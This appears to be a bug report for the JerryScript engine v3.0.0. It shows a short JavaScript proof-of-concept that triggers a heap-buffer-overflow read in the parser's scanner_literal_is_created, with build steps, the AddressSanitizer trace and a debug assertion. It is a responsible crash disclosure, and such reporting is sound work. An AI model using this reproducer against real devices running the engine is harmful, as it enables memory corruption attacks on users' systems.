heap-buffer-overflow in scanner_literal_is_created

[Ye0nny]

JerryScript revision

Commit: 05dbbd1
Version: v3.0.0

Build platform

Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86_64)

Build steps

python ./tools/build.py --clean --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20

Test case

testcase

class s extends Uint32Array { static [ null ] ; [ null ] ; static [ null ] ; static set ( ) { } static { } ; } const n = new s ( t ) ; const t = BigInt ( ) ; assert ( n === Uint32Array ) ;

// poc.js
class s extends Uint32Array {  static { } ; } const n = new s ( ) ; const t = BigInt ( ) ; 

Execution steps & Output

$ ./jerryscript/build/bin/jerry poc.js
=================================================================
==3080358==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf510068c at pc 0x566887dc bp 0xfff81e68 sp 0xfff81e58
READ of size 2 at 0xf510068c thread T0
    #0 0x566887db in scanner_literal_is_created ./jerryscript/jerry-core/parser/js/js-scanner-util.c:2922
    #1 0x566f8265 in parser_parse_var_statement ./jerryscript/jerry-core/parser/js/js-parser-statm.c:523
    #2 0x566fda21 in parser_parse_statements ./jerryscript/jerry-core/parser/js/js-parser-statm.c:3021
    #3 0x5667eb25 in parser_parse_source ./jerryscript/jerry-core/parser/js/js-parser.c:2280
    #4 0x566113cf in jerry_parse_common ./jerryscript/jerry-core/api/jerryscript.c:412
    #5 0x56611631 in jerry_parse ./jerryscript/jerry-core/api/jerryscript.c:480
    #6 0x56706644 in jerryx_source_parse_script ./jerryscript/jerry-ext/util/sources.c:52
    #7 0x56706701 in jerryx_source_exec_script ./jerryscript/jerry-ext/util/sources.c:63
    #8 0x56609d04 in main ./jerryscript/jerry-main/main-desktop.c:156
    #9 0xf7627ed4 in __libc_start_main (/lib32/libc.so.6+0x1aed4)
    #10 0x5660cfb4 in _start (./jerryscript/build/bin/jerry+0x12fb4)

0xf510068c is located 4 bytes to the left of 8-byte region [0xf5100690,0xf5100698)
allocated by thread T0 here:
    #0 0xf7a10817 in __interceptor_malloc ../../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144
    #1 0x5660cae4 in jmem_heap_alloc ./jerryscript/jerry-core/jmem/jmem-heap.c:254
    #2 0x56671d8d in jmem_heap_gc_and_alloc_block ./jerryscript/jerry-core/jmem/jmem-heap.c:291
    #3 0x566f25ab in parser_malloc ./jerryscript/jerry-core/parser/js/js-parser-mem.c:43
    #4 0x56686c95 in scanner_create_variables ./jerryscript/jerry-core/parser/js/js-scanner-util.c:2341
    #5 0x5667eae1 in parser_parse_source ./jerryscript/jerry-core/parser/js/js-parser.c:2277
    #6 0x566113cf in jerry_parse_common ./jerryscript/jerry-core/api/jerryscript.c:412
    #7 0x56611631 in jerry_parse ./jerryscript/jerry-core/api/jerryscript.c:480
    #8 0x56706644 in jerryx_source_parse_script ./jerryscript/jerry-ext/util/sources.c:52
    #9 0x56706701 in jerryx_source_exec_script ./jerryscript/jerry-ext/util/sources.c:63
    #10 0x56609d04 in main ./jerryscript/jerry-main/main-desktop.c:156
    #11 0xf7627ed4 in __libc_start_main (/lib32/libc.so.6+0x1aed4)

SUMMARY: AddressSanitizer: heap-buffer-overflow ./jerryscript/jerry-core/parser/js/js-scanner-util.c:2922 in scanner_literal_is_created
Shadow bytes around the buggy address:
  0x3ea20080: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3ea20090: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3ea200a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3ea200b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3ea200c0: fa fa fa fa fa fa 05 fa fa fa 05 fa fa fa fd fd
=>0x3ea200d0: fa[fa]00 fa fa fa 00 04 fa fa fd fd fa fa fd fd
  0x3ea200e0: fa fa fd fd fa fa 00 07 fa fa 00 06 fa fa 00 03
  0x3ea200f0: fa fa 00 07 fa fa 00 00 fa fa fa fa fa fa fa fa
  0x3ea20100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3ea20110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3ea20120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==3080358==ABORTING

---

with debugging mode(--debug)

Outputs

ICE: Assertion 'scope_stack_p > context_p->scope_stack_p' failed at ./jerryscript/jerry-core/parser/js/js-scanner-util.c(scanner_literal_is_created):2920.
Error: JERRY_FATAL_FAILED_ASSERTION
Aborted

Credits: @Ye0nny, @EJueon of the seclab-yonsei.